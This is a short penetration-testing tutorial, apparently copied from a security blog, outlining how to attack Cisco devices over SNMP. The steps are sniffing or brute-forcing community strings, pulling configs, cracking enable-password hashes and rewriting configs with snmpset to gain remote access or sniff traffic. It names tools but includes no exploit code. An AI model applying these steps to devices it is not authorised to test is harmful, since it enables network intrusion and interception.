Hacking Cisco with SNMP

Being able to evaluate the strength of a customers infrastructure is a very important part of a penetration test. Many pen testers limit their tests by overlooking the SNMP protocol and the devices that use it. With a successful discovery of SNMP Community Strings you can go as far as to reconfigure a device for remote access (ssh, telnet, http/https) or setup a SPAN port to sniff internal traffic. Before we start there are a few things you should know about SNMP:

UDP Port 161. Since its UDP its fast.

Community Strings provide either Read or Read-Write permissions. Obviously we prefer RW.

SNMP v1-v2 is clear text. v3 is encrypted.

Here is the usual process taken to attack SNMP and the tools that will help you do it.

1) Obtain Community Strings

-Sniff clear text – Wireshark use the filter: udp port 161

-Guessing Community Strings – Onesixtyone, Metasploit (auxiliary/scanner/snmp/snmp_login), snmpblow

2) Setup TFTP Server

3) Identify Updating MIB : snmpwalk

4) Download Device Configs : snmpblow

5) Crack Enable Passwords (salted MD5) : John the Ripper , oclHashcat

6) Modify Config

7) Update Device Config : snmpset

You can see that these steps are pretty straight forward. Have fun experimenting with the tools. I would HIGHLY discourage attacking SNMP in a production environment unless you have thoroughly experimented with the process in a controlled lab.

Copy & Paste From :

http://securityreliks.securegossip.com/2011/04/hacking-snmp-in-a-few-simple-steps/